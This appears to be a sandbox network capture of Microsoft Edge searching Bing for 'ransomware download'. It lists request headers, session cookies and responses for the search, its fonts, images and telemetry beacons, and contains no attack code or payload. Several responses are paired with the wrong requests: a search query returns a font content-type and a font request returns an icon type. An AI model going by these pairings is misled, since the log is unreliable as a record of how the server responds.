set-cookie: MUID=060B31E3593A60702C3D25D75802611A; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; HttpOnly
set-cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: SRCHS=PC=U531; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=ANAB01; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:48 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220708.b313ea5
-
GEThttps://www.bing.com/qbox?query=ransomware+downloa&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=879b47079efa4c27b2edc8558ec4966a&oit=4&cp=18&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomware+downloa&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=879b47079efa4c27b2edc8558ec4966a&oit=4&cp=18&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: font/woff2
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-PyUlR0bouajIhgeYjVWKJlH5/budIEVthqVfF+hY9KU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Thu, 29 Feb 2024 15:31:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220708.b314099
-
GEThttps://www.bing.com/qbox?query=ransomware+download&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=04a982ca0cb44fd49374739a929f08a5&oit=4&cp=19&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomware+download&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=04a982ca0cb44fd49374739a929f08a5&oit=4&cp=19&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: font/woff2
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-CUL37g/P4ANslMI6+IobvJQclx3PUHxWAwkZQjNPJb0='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Thu, 29 Feb 2024 15:31:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220708.b3140a5
-
GEThttps://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531msedge.exeRemote address:92.123.128.152:443RequestGET /search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DC1CBFB9D7068E
cache-control: public, no-transform, max-age=428258
expires: Sat, 02 Mar 2024 02:36:01 GMT
akamai-grn: 0.b5777b5c.1708918703.1bfa90a3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 9002
content-type: image/png
content-md5: f09Mfa7yqtUYlQpALPKYMQ==
x-ms-request-id: af2469e2-c01e-005f-65da-60f116000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
date: Thu, 29 Feb 2024 15:31:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220708.b31419d
-
Remote address:92.123.128.152:443RequestGET /sa/simg/Roboto_Regular.woff2 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en
ResponseHTTP/2.0 200
content-type: image/x-icon
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
x-cdn-traceid:
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b3146b7
-
Remote address:92.123.128.152:443RequestGET /sa/simg/Roboto_Semibold.woff2 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en
ResponseHTTP/2.0 200
etag: 0x8DBFC06F3CBD118
akamai-grn: 0.59281102.1708897727.d30bb097
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: 51bDyaIT6vSMRE7xaOBuww==
x-ms-request-id: 0e46dded-701e-0017-67ae-4cec21000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 6724
vary: Accept-Encoding
cache-control: public, no-transform, max-age=319556
expires: Fri, 01 Mar 2024 01:06:58 GMT
akamai-grn: 0.47281102.1708935662.9c88fb0f
timing-allow-origin: *
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314742
-
Remote address:92.123.128.152:443RequestGET /rp/yzhK9LMK0pK8FBXJDlWpAoFuOfI.png HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 81A913D01B114B5AA640717C49A7DA69 Ref B: LTSEDGE1508 Ref C: 2024-02-29T15:31:49Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b3146ac
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:83,%22BC%22:491,%22SE%22:-1,%22TC%22:-1,%22H%22:623,%22BP%22:625,%22CT%22:626,%22IL%22:10},%22ad%22:[43,396,1263,609,1263,4731,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:83,%22BC%22:491,%22SE%22:-1,%22TC%22:-1,%22H%22:623,%22BP%22:625,%22CT%22:626,%22IL%22:10},%22ad%22:[43,396,1263,609,1263,4731,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5905516463894DE28A3797C2AB8D41AE Ref B: LTSEDGE1508 Ref C: 2024-02-29T15:31:49Z
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314741
-
Remote address:92.123.128.152:443RequestGET /sa/simg/favicon-trans-bg-blue-mg.ico HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en
ResponseHTTP/2.0 200
etag: 0x8DBFA9F36A4F869
cache-control: public, no-transform, max-age=431913
expires: Mon, 04 Mar 2024 21:54:11 GMT
akamai-grn: 0.a4777b5c.1709157338.1fdfbabd
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1929
content-type: image/png
content-md5: TBVfy13T2kZEUa0kC23mBg==
x-ms-request-id: 5e11f72b-901e-0042-4714-66fcaa000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b31484a
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 353
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0AAACE8017D2414289DFA43C6DB4A117 Ref B: LTSEDGE1508 Ref C: 2024-02-29T15:31:49Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314909
-
Remote address:92.123.128.152:443RequestGET /rp/-7ETfQzBkK_2PbGk8r_3rM8GSu0.br.js HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 63607C25F44A42159412A8C02B5E6940 Ref B: LTSEDGE1112 Ref C: 2024-02-29T15:31:49Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314908
-
Remote address:92.123.128.152:443RequestGET /rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 277F458484F64294B86E13D0B22453DE Ref B: LON04EDGE0710 Ref C: 2024-02-29T15:31:49Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b31490b
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CD1E87E5F219444CA36C585ADEA40DC8 Ref B: LTSEDGE1422 Ref C: 2024-02-29T15:31:49Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314919
-
